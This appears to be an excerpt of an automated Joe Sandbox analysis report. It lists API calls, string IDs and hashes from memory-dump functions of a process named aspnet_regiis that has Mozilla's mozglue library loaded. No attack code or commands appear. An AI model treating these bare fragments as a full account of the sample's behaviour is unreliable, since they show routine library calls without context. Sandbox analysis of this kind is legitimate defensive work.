                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3161513745-0
                                                                                                                            • Opcode ID: c871773255243bf3dd1aacc9d58e3146efe59f064713217a28b2b88ff078a98f
                                                                                                                            • Instruction ID: f2e6db6b47c668a90793021b207ddf58b0189d5208c93d998618ba5ca0df8759
                                                                                                                            • Opcode Fuzzy Hash: c871773255243bf3dd1aacc9d58e3146efe59f064713217a28b2b88ff078a98f
                                                                                                                            • Instruction Fuzzy Hash: 223141B1A012159FDB10DF769C44AABBBF8EF88714F158829E84AE7740F7349814CBA0
                                                                                                                            APIs
                                                                                                                            • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CC9DCA0,?,?,?,6CC5E8B5,00000000), ref: 6CC85F1F
                                                                                                                            • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC5E8B5,00000000), ref: 6CC85F4B
                                                                                                                            • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CC5E8B5,00000000), ref: 6CC85F7B
                                                                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CC5E8B5,00000000), ref: 6CC85F9F
                                                                                                                            • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC5E8B5,00000000), ref: 6CC85FD6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1389714915-0
                                                                                                                            • Opcode ID: 4bf7cf7c35cf5d45e0f4568a35762c9cf265f6b77da16f49728eefce86a19f36
                                                                                                                            • Instruction ID: c589fc615889f37b30bbacbc9b886fe7135dac8c6a0b26dffd4dc4ba7800851e
                                                                                                                            • Opcode Fuzzy Hash: 4bf7cf7c35cf5d45e0f4568a35762c9cf265f6b77da16f49728eefce86a19f36
                                                                                                                            • Instruction Fuzzy Hash: 8C312A343016048FE710CF69C898E2ABBF9FF89319B648598E5578BB95DB71EC41CB80
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC2B532
                                                                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC2B55B
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC2B56B
                                                                                                                            • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC2B57E
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC2B58F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4244350000-0
                                                                                                                            • Opcode ID: 48c9bad459ecd5bc87242e5bc539c43d65668b94cd0c8bde2338bf733d256b02
                                                                                                                            • Instruction ID: 9020d6467d97d03dad1bdf227b5e833e3ca0ed13729fa079901d20a970ebeae8
                                                                                                                            • Opcode Fuzzy Hash: 48c9bad459ecd5bc87242e5bc539c43d65668b94cd0c8bde2338bf733d256b02
                                                                                                                            • Instruction Fuzzy Hash: 9621F671A002059BDB008FA9DC50BAEBBB9FF42304F284139E919DB341F77AD951C7A1
                                                                                                                            APIs
                                                                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC2B7CF
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC2B808
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC2B82C
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC2B840
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC2B849
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1977084945-0
                                                                                                                            • Opcode ID: 4f89654d6d0d9043c17e8aa6f1d4d9e719629cbd7225d5261060d469ef3ce4ca
                                                                                                                            • Instruction ID: 6297aca3a32c838319ed99a7030be7069495c961ba1d58f2cdd1f7e01311b94d
                                                                                                                            • Opcode Fuzzy Hash: 4f89654d6d0d9043c17e8aa6f1d4d9e719629cbd7225d5261060d469ef3ce4ca
                                                                                                                            • Instruction Fuzzy Hash: AD2128B0E002099FDF04DFA9D8955BEBBB4EF49314F14812AE84AA7341E735A945CBA1
                                                                                                                            APIs
                                                                                                                            • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CC86E78
                                                                                                                              • Part of subcall function 6CC86A10: InitializeCriticalSection.KERNEL32(6CCAF618), ref: 6CC86A68
                                                                                                                              • Part of subcall function 6CC86A10: GetCurrentProcess.KERNEL32 ref: 6CC86A7D
                                                                                                                              • Part of subcall function 6CC86A10: GetCurrentProcess.KERNEL32 ref: 6CC86AA1
                                                                                                                              • Part of subcall function 6CC86A10: EnterCriticalSection.KERNEL32(6CCAF618), ref: 6CC86AAE
                                                                                                                              • Part of subcall function 6CC86A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC86AE1
                                                                                                                              • Part of subcall function 6CC86A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC86B15
                                                                                                                              • Part of subcall function 6CC86A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC86B65
                                                                                                                              • Part of subcall function 6CC86A10: LeaveCriticalSection.KERNEL32(6CCAF618,?,?), ref: 6CC86B83
                                                                                                                            • MozFormatCodeAddress.MOZGLUE ref: 6CC86EC1
                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC86EE1
                                                                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC86EED
                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CC86EFF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4058739482-0
                                                                                                                            • Opcode ID: af14cddd41d77ce9cdb3ec925910675d009359937c01d41b4fa37dfc279a3070
                                                                                                                            • Instruction ID: 37f67466b9578e7140e962580ea00750ccf5578db290b7f6f2f5f4db0d4e4077
                                                                                                                            • Opcode Fuzzy Hash: af14cddd41d77ce9cdb3ec925910675d009359937c01d41b4fa37dfc279a3070
                                                                                                                            • Instruction Fuzzy Hash: 8D21A471A042199FDB00CF69D8856DF7BF5FF88308F044039E80997341EB749A598F92
                                                                                                                            APIs
                                                                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC876F2
                                                                                                                            • moz_xmalloc.MOZGLUE(00000001), ref: 6CC87705
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CC87717
                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CC8778F,00000000,00000000,00000000,00000000), ref: 6CC87731
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC87760
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2538299546-0
                                                                                                                            • Opcode ID: d3b45af09c8b64400e4879f29e4992e2c15943634bfca3b3af7ecb8d72c37160
                                                                                                                            • Instruction ID: b4491b9d1a97bd90dc65e685dc65ec503025251cac029d68f6bd4a253f7aeb20
                                                                                                                            • Opcode Fuzzy Hash: d3b45af09c8b64400e4879f29e4992e2c15943634bfca3b3af7ecb8d72c37160
                                                                                                                            • Instruction Fuzzy Hash: A711B2B1A012256BEB10AFB69C44BABBEF8EF46354F044529F848A7300F7708850C7E2
                                                                                                                            APIs
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC23DEF), ref: 6CC60D71
                                                                                                                            • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC23DEF), ref: 6CC60D84
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC23DEF), ref: 6CC60DAF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Free$Alloc
                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                            • API String ID: 1852963964-2186867486
                                                                                                                            • Opcode ID: b5a1accb29b54bf884a652603dff49dd51a3cc6197800f7ca93e987c234daa3a
                                                                                                                            • Instruction ID: c29e68b4c5127da609290b4c12f5fa97a0b9c22f4af7d53325732dc71c8585f7
                                                                                                                            • Opcode Fuzzy Hash: b5a1accb29b54bf884a652603dff49dd51a3cc6197800f7ca93e987c234daa3a
                                                                                                                            • Instruction Fuzzy Hash: C2F0E93138069923E62413AB9D4EB5A367D7BC2B65F344176F214FFDC0FA50E8054AAD
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CC775C4,?), ref: 6CC7762B
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CC774D7,6CC815FC,?,?,?), ref: 6CC77644
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7765A
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC774D7,6CC815FC,?,?,?), ref: 6CC77663
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC774D7,6CC815FC,?,?,?), ref: 6CC77677
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 418114769-0
                                                                                                                            • Opcode ID: 86fcc03d842133fbd479619ce46904bd284e78c36ab32138192b6e0f3e6dea7e
                                                                                                                            • Instruction ID: 0c3a593002640434867c385143d08605f9735549f67fe783627da1af629c4da3
                                                                                                                            • Opcode Fuzzy Hash: 86fcc03d842133fbd479619ce46904bd284e78c36ab32138192b6e0f3e6dea7e
                                                                                                                            • Instruction Fuzzy Hash: D0F0C271E10749ABD7008F62D89867AB778FFEB359F11531AF90453601E7B1A5D08BD0
                                                                                                                            APIs
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC81800
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                              • Part of subcall function 6CC24290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC63EBD,6CC63EBD,00000000), ref: 6CC242A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                                                            • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D4F2
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D50B
                                                                                                                              • Part of subcall function 6CC2CFE0: EnterCriticalSection.KERNEL32(6CCAE784), ref: 6CC2CFF6
                                                                                                                              • Part of subcall function 6CC2CFE0: LeaveCriticalSection.KERNEL32(6CCAE784), ref: 6CC2D026
                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D52E
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAE7DC), ref: 6CC4D690
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAE784,?,?,?,?,?,?,?,00000000,771B2FE0,00000001,?,6CC5D1C5), ref: 6CC4D751
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                            • String ID: MOZ_CRASH()
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldiv
                                                                                                                            • String ID: -%llu$.$profiler-paused
                                                                                                                            APIs
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC74721
                                                                                                                              • Part of subcall function 6CC24410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CC63EBD,00000017,?,00000000,?,6CC63EBD,?,?,6CC242D2), ref: 6CC24444
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                                            • String ID: -%llu$.$profiler-paused
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC24290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC63EBD,6CC63EBD,00000000), ref: 6CC242A9
                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CC7B127), ref: 6CC7B463
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7B4C9
                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CC7B4E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _getpidstrlenstrncmptolower
                                                                                                                            • String ID: pid:
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6E577
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6E584
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6E5DE
                                                                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC6E8A6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                            • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC70CD5
                                                                                                                              • Part of subcall function 6CC5F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC5F9A7
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC70D40
                                                                                                                            • free.MOZGLUE ref: 6CC70DCB
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            • free.MOZGLUE ref: 6CC70DDD
                                                                                                                            • free.MOZGLUE ref: 6CC70DF2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                            • String ID:
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7CDA4
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                              • Part of subcall function 6CC7D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CC7CDBA,00100000,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7D158
                                                                                                                              • Part of subcall function 6CC7D130: InitializeConditionVariable.KERNEL32(00000098,?,6CC7CDBA,00100000,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7D177
                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7CDC4
                                                                                                                              • Part of subcall function 6CC77480: ReleaseSRWLockExclusive.KERNEL32(?,6CC815FC,?,?,?,?,6CC815FC,?), ref: 6CC774EB
                                                                                                                            • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7CECC
                                                                                                                              • Part of subcall function 6CC3CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC3CAA2
                                                                                                                              • Part of subcall function 6CC6CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CC7CEEA,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?,00000000), ref: 6CC6CB57
                                                                                                                              • Part of subcall function 6CC6CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CC6CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CC7CEEA,?,?), ref: 6CC6CBAF
                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?,00000000,?), ref: 6CC7D058
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
